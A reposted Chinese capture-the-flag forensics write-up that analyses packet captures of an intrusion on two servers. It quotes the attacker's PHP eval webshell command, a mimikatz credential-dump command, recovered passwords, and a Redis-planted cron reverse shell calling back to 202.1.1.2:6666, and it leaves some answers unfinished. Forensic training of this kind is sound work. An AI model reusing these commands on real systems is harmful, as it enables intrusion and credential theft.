鏈接: https://pan.baidu.com/s/145V_xyiMNOIE5bFbCTtNNg 密碼: v6wu

1.被攻擊的兩個服務器的內網ip分別是多少，以下簡稱服務器1和2(格式：空格分隔，按黑客攻擊順序排列） 2.兩臺服務器的主機名分別是什么 3.黑客使用了什么工具對服務器1進行的攻擊(小寫) 4.黑容成功登陸網站后臺的賬號密碼以及驗證碼是什么(格式user/pass/vcode) 5.黑客向服務器1寫入webshell的具體命令是什么(url解碼后) 6.服務器1都開啟了哪些允許外連的TCP注冊端口(端口號從小到大，用空格間隔) 7.服務器1安裝的修補程序名稱 8.網站根目錄的絕對路徑(注意：大寫，左斜杠，最后要有一個斜杠) 9.黑客使用什么命令或文件進行的內網掃描 10.掃描結果中服務器2開放了哪些端口(端口號從小到大，用空格隔開) 11.黑客執行的什么命令將administrator的密碼保存到文件中 12.服務器1的系統管理員administrator的密碼是什么 13.黑客進行內外掃描的ip范圍(格式:xx.xx.xx.xx~xx.xx.xx.xx) 14.服務器1的mysql的root用戶的密碼是什么 15.黑客在服務器2中查看了哪個敏感文件(拿到shell之后)，請寫出絕對路徑 16.服務器2的web網站后臺賬號密碼(格式:賬號/密碼) 17.黑客在redis未授權訪問中反彈shell的ip和端口是多少 18.黑客拿到root權限后執行的第二條命令是什么 19.服務器2的root用戶密碼是什么 20.黑客向服務器2寫入webshell的命令 21.pcap中哪些ip發送過無償ARP包(空格分隔，時間順序排序)

1.被攻擊的兩個服務器的內網ip分別是多少，以下簡稱服務器1和2(格式：空格分隔，按黑客攻擊順序排列）??

數據包1

http

攻擊者ip 202.1.1.2 服務器1ip 192.168.1.74? 服務器2ip 見下面分析

2.兩臺服務器的主機名分別是什么??

找phpinfo

http contains "phpinfo"

數據包二中找到

將返回的phpinfo源碼復制到新建的html中，保存后打開

可以看到服務器1的主機名?TEST-7E28AF8836

在后續的數據包中繼續過濾

ip.addr == 192.168.2.66 && http contains "phpinfo"

?

3.黑客使用了什么工具對服務器1進行的攻擊(小寫)?

sqlmap

4.黑容成功登陸網站后臺的賬號密碼以及驗證碼是什么(格式user/pass/vcode)??

ip.addr == 192.168.1.74 && ip.addr ==202.1.1.2 &&http

發現數據包1中，一直在跑sqlmap

數據包2中，跑完sqlmap后開始掃目錄

掃到后臺后，開始登陸，看到下面返回admin后臺相關的內容，說明此處提交的user和pwd正確

5.黑客向服務器1寫入webshell的具體命令是什么(url解碼后)??

數據包二的最下面發現多了個，abc.php，應該不是網站本身的文件，看到上面通過php命令執行寫的shell

http://202.1.1.1/tmpbjhbf.php?cmd=echo ^<?php^ eval($_POST[ge]);?^>>abc.php

?6.服務器1都開啟了哪些允許外連的TCP注冊端口(端口號從小到大，用空格間隔)??

查看abc.php的請求包都是b64，所以abc.php菜刀一句話呀

總是b64decode太麻煩，不如看對應的返回包，大致能猜出菜刀做了什么操作

接著數據包3

菜刀上傳了scan.php掃內網

tunel.nosoket.php作為內網代理

mimi下的mimikatz.exe用來dump服務器1的密碼

可以看到服務器1開放的端口有80 135 445 1025 3306 3389 139

TCP注冊端口(小于1024)

所以服務器1允許外連的TCP注冊端口為80 135 139 445

這時候需要Google搞明白這幾個端口是干啥用的。。

緊接著菜刀執行了systeminfo

返回

服務器1為Windows,修補程序Q147222

scan.php 掃描內網 192.168.1.1~192.168.3.255? 掃描端口 21,80,8080,1433,3306,6379

追蹤tcp流查看返回

<br/>Scanning IP 192.168.1.1<br/> Port: 80 is open<br/> <br/>Scanning IP 192.168.1.8<br/> Port: 80 is open<br/> Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.33<br/> 17Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.74<br/> Port: 80 is open<br/> Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.159<br/> Port: 80 is open<br/> Port: 8080 is open<br/> Port: 3306 is open<br/><br/>Scanning IP 192.168.1.169<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/>21 <br/>Scanning IP 192.168.2.1<br/> 15 Port: 80 is open<br/> 21<br/>Scanning IP 192.168.2.20<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 2222 <br/>Scanning IP 192.168.2.66<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 17 Port: 6379 is open<br/> 2222 <br/>Scanning IP 192.168.2.88<br/> 15 Port: 21 is open<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 2221 <br/>Scanning IP 192.168.3.1<br/> 15 Port: 80 is open<br/><br/>Scanning IP 192.168.3.6<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 21

7.服務器1安裝的修補程序名稱? ? 從systeminfo返回可看出

8.網站根目錄的絕對路徑(注意：大寫，左斜杠，最后要有一個斜杠)? ? phpinfo 可找到

?9.黑客使用什么命令或文件進行的內網掃描? ? ?scan.php

10.掃描結果中服務器2開放了哪些端口(端口號從小到大，用空格隔開)??

?前面只掃了192.168.1.1-192.168.3.255 說明服務器2就從這個網段之間，并且有端口開放的那幾個之間選擇。。

數據包四

所以服務器2 ip 192.168.2.66

從上面scan.php返回結果可知，掃描結果中服務器2開放了80 3306 6379

11.黑客執行的什么命令將administrator的密碼保存到文件中??

?返回數據包3，黑客用mimikatz dump下服務器已的密碼

說明將administrator的密碼保存到文件中 的操作就在這附近

cd /d "C:\WWW\my\mimi\"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt&echo [S]&cd&echo [E]

12.服務器1的系統管理員administrator的密碼是什么?

從上面mimiditz的log可知administrator的密碼為Simplexue123?

13.黑客進行內外掃描的ip范圍(格式:xx.xx.xx.xx~xx.xx.xx.xx) 192.168.1.1~192.168.3.255

14.服務器1的mysql的root用戶的密碼是什么??

mysql相關信息一般都存在config配置文件中

可以http過濾后查看113060到472649之間的config請求包及respone,或者直接過濾root

http contains "root"

15.黑客在服務器2中查看了哪個敏感文件(拿到shell之后)，請寫出絕對路徑

數據包5

tcp and !(tcp.port == 80) and !(tcp.port == 443) and !(tcp.stream eq 98) and ip.addr == 202.1.1.2

追蹤tcp流

可看到絕對路徑/var/www/html/

16.服務器2的web網站后臺賬號密碼(格式:賬號/密碼)

http contains "admin" ||http contains "pass"

服務器2開啟的6379端口應該是redis的，貌似黑客通過redis未授權訪問拿到shell然后進行后續操作的。

那么應該過濾tcp.port == 6379

數據包4內沒有相關內容

數據包5

* * * * * bash -i >& /dev/tcp/202.1.1.2/6666 0>&1

so黑客在redis未授權訪問中反彈shell的ip和端口是202.1.1.2和6666

18.黑客拿到權限后執行的第二條命令是什么?

cd /var/www/html

19.服務器2的root用戶密碼是什么

?

20.黑客向服務器2寫入webshell的命令

21.pcap中哪些ip發送過無償ARP包(空格分隔，時間順序排序)

?無償arp包，可以發現isgratuitous必須為true。利用規則arp.isgratuitous == true可以找到數據包。。。

不過，我還是沒找到。。。

?

轉載于:https://www.cnblogs.com/1go0/p/10065813.html

總結

以上是生活随笔為你收集整理的2018.6.1信息安全铁人三项赛数据赛writeup的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。